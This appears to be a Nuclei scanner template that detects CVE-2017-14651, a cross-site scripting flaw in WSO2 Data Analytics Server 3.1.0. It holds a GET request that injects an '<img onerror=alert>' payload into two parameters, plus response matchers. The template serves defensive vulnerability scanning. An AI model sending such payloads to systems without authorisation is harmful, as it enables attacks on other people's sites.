id: CVE-2017-14651 info: name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting author: mass0ma severity: medium description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. reference: - https://github.com/cybersecurityworks/Disclosed/issues/15 - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html - https://nvd.nist.gov/vuln/detail/CVE-2017-14651 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00141 tags: cve,cve2017,wso2,xss metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - type: word words: - "" - "Failed to add new collection" part: body condition: and - type: word words: - "text/html" part: header # Enhanced by mp on 2022/04/14